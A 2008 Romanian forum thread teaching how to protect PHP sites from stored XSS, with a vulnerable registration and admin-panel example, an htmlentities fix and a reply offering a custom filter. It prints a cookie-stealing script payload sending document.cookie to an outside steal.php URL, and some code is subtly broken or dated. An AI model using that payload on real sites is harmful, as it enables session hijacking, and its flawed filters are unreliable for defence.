chessh Posted July 11, 2008 Report Posted July 11, 2008 Cum sa te protejezi de XSSDefinitia XSS-uluiUn atac XSS (Cross-Site Scripting) reprezinta o vulnerabilitate a aplicatiilor web ce apare atunci cand acestea afisaza date care nu sunt valide. Acesta consta in introducerea unui cod, pentru executia acestuia in respectivul site. De obicei, codul este scris in unul din urmatoarele limbaje: JavaScript, (X)HTML, VBScript, ActiveX, Java sau Flash (ar mai fi si altele).Scopul XSS-uluiScopul acestui tip de atac este de a fura cookie-urile unor anumiti utilizatori sau pentru a fura diferite informatii utile despre utilizatori, necesare hackerilor. In general aceste atacuri ii vizeaza pe cei cu drepturi privilegiate ale aplicatiei web (administratori sau alt rang important).In general atacurile implica doua lucruri (hackerul si site-ul), insa XSS-ul implica trei (hackerul, site-ul si utilizatorii site-ului).Despre XSSAtacurile de acest tip se folosesc de datele ce vin din exterior. Asadar formularele, e-mail-ul web, fisierele de tip XML sau RSS si bazele de date sunt cel mai des folosite de hackeri. Pentru a intelege mai bine, va voi face o schema, dupa care actioneaza majoritatea hackerilor.Hackerul intra pe siteHackerul verifica daca vulnerabilitatea este prezentaIn cazul in care site-ul este vulnerabil, el introduce date care vor fi stocate in baza de dateUn utilizator intra pe o pagina a site-ului care se conecteaza la baza de date si afisaza datele stocate in aceasta (incluzand cele introduse de hacker)Cookie-urile utilizatorului sunt trimise hackeruluiExemplu XSSVa voi arata prin acest exemplu, cum un hacker poate fura un cont cu ajutorul acestei vulnerabilitati.Vom crea o noua baza de date (folosind phpMyAdmin) numita xss si tabelul users, cu doua campuri: user si pass.CREATE DATABASE xss;USE xss;CREATE TABLE users (id INT NOT NULL AUTO_INCREMENT, user VARCHAR(20) NOT NULL, pass VARCHAR(32) NOT NULL, PRIMARY KEY(id));Avem urmatorul script simplu de inregistrare:<html><head><title>Script inregistrare</title></head><body><?php if(isset($_POST['submit'])) { $_POST['user'] = mysql_real_escape_string($_POST['user']); $_POST['pass'] = md5($_POST['pass']); @mysql_connect('localhost', 'root', '') or die('MySQL error.'); @mysql_select_db('xss') or die('MySQL error.'); $sql = "INSERT INTO users (user, pass) VALUES ('{$_POST['user']}', '{$_POST['pass']}')"; $result = @mysql_query($sql) or die('MySQL error.'); @mysql_close();} else { ?><form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> Username: <input type="text" name="user" /> Password: <input type="password" name="pass" /> <input type="submit" name="submit" value="Register" /></form><?php } ?></body></html>Acum, o parte din codul panoului de administrare a site-ului, in care sunt afisati utilizatorii inregistrati:<html><head><title>Panou de administrare</title></head><body>Utilizatori inregistrati:<?php@mysql_connect('localhost', 'root', '') or die('MySQL error.');@mysql_select_db('xss') or die('MySQL error.');$sql = "SELECT * FROM users";$result = @mysql_query($sql) or die('MySQL error.');while($result = mysql_fetch_array($result)) { echo $row['user'].'';} ?></body></html>Acum sa vedem ce se intampla. Daca de exemplu, hackerul introduce in campul user urmatorul cod JavaScript:<script>alert("Ti-am spart site-ul!");</script>Cand administratorul va intra pe pagina care afisaza utilizatorii inregistrati, va aparea o caseta JavaScript care va afisa 'Ti-am spart site-ul!' (fara ghilimele). Pana acum, nimic grav. In cazul in care hackerul introduce codul urmator:<script>document.location = 'http://www.site.com/steal.php?cookies=' + document.cookie;</script>Cand administratorul va intra pe pagina care afisaza utilizatorii inregistrati, cookie-urile sale vor fi trimise catre 'http://www.site.com/steal.php' prin variabila $_GET['cookies']. Hackerul poate folosi aceste cookie-uri si poate capata acces in panoul de administrare.Pentru a preveni acest lucru, scriptul de afisare al utilizatorului va trebui sa arate asa:<html><head><title>Panou de administrare</title></head><body>Utilizatori inregistrati:<?php@mysql_connect('localhost', 'root', '') or die('MySQL error.');@mysql_select_db('xss') or die('MySQL error.');$sql = "SELECT * FROM users";$result = @mysql_query($sql) or die('MySQL error.');while($result = mysql_fetch_array($result)) { echo htmlentities($row['user']).'';} ?></body></html>Asadar, functia htmlentities() este folosita pentru a preveni introducerea sau injectarea a unui astfel de cod, ea ignorand tag-urile.Prevenirea XSS-uluiAsadar cum putem preveni atacurile XSS? Cateva functii PHP care ne vor ajuta sunt:htmlentities();htmlspecialchars();strip_tags();mysql_escape_string();mysql_real_escape_string();addslashes();Sper sa va fie de folos. Daca am vreo greseala, va rog postati un reply. Quote
chessh Posted July 11, 2008 Author Report Posted July 11, 2008 Ma bucur ca ti-am fost de folos. Quote
Freakcro Posted July 11, 2008 Report Posted July 11, 2008 Fain e folositor .... macar dak scriai de unde l-ai luat? Doar nu e 100% al tau Quote
chessh Posted July 11, 2008 Author Report Posted July 11, 2008 Sa vezi si sa nu crezi. E facut de mine Quote
moubik Posted July 11, 2008 Report Posted July 11, 2008 poti sa treci de html_entities daca nu il folosesti corecteu preferfunction filterCross($filterMe){ $tempMe = $filterMe; $filterMe = str_replace("&", "&", $filterMe); //$filterMe = str_replace("#", "#", $filterMe); $filterMe = str_replace("<", "<", $filterMe); $filterMe = str_replace(">", ">", $filterMe); //$filterMe = str_replace("(", "(", $filterMe); //$filterMe = str_replace(")", ")", $filterMe); $filterMe = str_replace('"', """, $filterMe); $filterMe = str_replace("'", "'", $filterMe); //$filterMe = str_replace("+", "+", $filterMe); if (strcmp($tempMe,$filterMe)) { //logHacker(); } return $filterMe;}functia e scoasa dintr-un site de-al meu Quote